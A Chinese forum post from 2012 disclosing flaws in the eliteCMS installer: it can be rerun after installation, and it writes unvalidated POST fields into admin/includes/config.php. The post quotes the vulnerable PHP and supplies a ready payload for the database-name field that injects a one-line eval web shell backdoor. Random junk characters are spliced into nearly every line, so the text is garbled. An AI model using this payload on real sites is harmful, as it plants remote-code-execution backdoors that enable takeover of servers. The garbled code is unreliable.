eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装: u# t: b9 K, F; `" C
8 {- R0 k: z- K4 V8 u$ L另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
- P) h2 V& g' G* V+ I1 j3 N我们来看代码:' k3 q/ Y" {. U* X* c* O
' W! H1 y0 _: C# B...5 F( s( p% w+ r( E/ b7 G; p7 H& C
elseif ($_GET['step'] == "4") {
7 Q$ i( h( I* s* f $file = "../admin/includes/config.php";& P/ h- U- f' y, {" Q
$write = "<?php\n";
# n9 G5 Y1 e" K1 S O5 e2 T, g, L $write .= "/**\n"; I3 P. a0 v, w1 j* S6 V) m
$write .= "*\n";7 m9 \1 [0 f1 ]9 i
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
6 a3 g$ ~3 b: Q. \...略...
: m7 O6 y6 @# s* Z/ k6 J0 b3 q $write .= "*\n";
% H1 H7 \" L- i- K8 g" C: Y8 j% M $write .= "*/\n";, y3 h& _9 b" L, Z1 e; P& Q F
$write .= "\n";
2 c4 O3 Z4 v7 \7 G' g) q* @ $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";) T' x5 r- n$ ?8 b5 z% d; Y
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
1 _1 p+ g% H4 p% @. T $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";* {2 K& k8 w9 {; R1 T3 w/ ~) a
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";7 E; j, s5 b3 B: }0 i# A
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";5 @, n) Z# d7 l8 Z; k
$write .= "if (!\$connection) {\n";! t1 D) t9 k* q% V, `; d; g* s: q* p
$write .= " die(\"Database connection failed\" .mysql_error());\n";
2 c2 z6 A% {- {& k $write .= " \n";
4 F q/ n, C; E$ o8 R. } $write .= "} \n";. V9 M, z! w7 A0 {7 ?/ u7 Y7 X
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";0 F* l/ m( L5 h/ L) ]0 ~' A
$write .= "if (!\$db_select) {\n";
) X* z# c3 m: u. D) R2 \ $write .= " die(\"Database select failed\" .mysql_error());\n";) Q9 H8 e: i8 y" U$ [4 b
$write .= " \n";
9 Q$ t5 U, a q5 Z) z% A) x$ w $write .= "} \n";
9 I7 Y0 a |3 }) t( i $write .= "?>\n";
7 b8 c9 u; Z( O5 u
. X5 g" T# U2 i5 B $writer = fopen($file, 'w');
+ y- Z Z0 d+ i8 `...8 x- c% `* k0 ?) k% }) N. B$ O
; P3 [2 R: ?$ u9 a& m
在看代码:$ ]2 |3 f$ c3 K1 ]
1 W4 G9 B1 i0 C; c. p
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
4 ]9 }) q& Q2 L; y6 H8 s* s3 V$_SESSION['DB_NAME'] = $_POST['DB_NAME'];; n) Y4 \; o) f: [6 g! E
$_SESSION['DB_USER'] = $_POST['DB_USER'];
- H- K5 q1 s. L, l( W2 k% @$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
5 L: k# ?. J& J, ^ ' Y) z7 f0 Q# e K3 ]# U
取值未作任何验证* ? D- w: Z" p- z% S
如果将数据库名POST数据:/ ~, h/ i* v& W- D$ ^+ L
4 t. ]/ O, ~( z+ w, ]9 g
"?><?php eval($_POST[c]);?><?php
: n8 k* z( x7 i; J# @# }% B& @3 M ` ! B8 i* g. w! Y6 {9 J4 h+ Q
将导致一句话后门写入/admin/includes/config.php
+ D$ x5 J. Y5 K6 n |
发表于 2012-11-18 13:59:27
收藏
支持
反对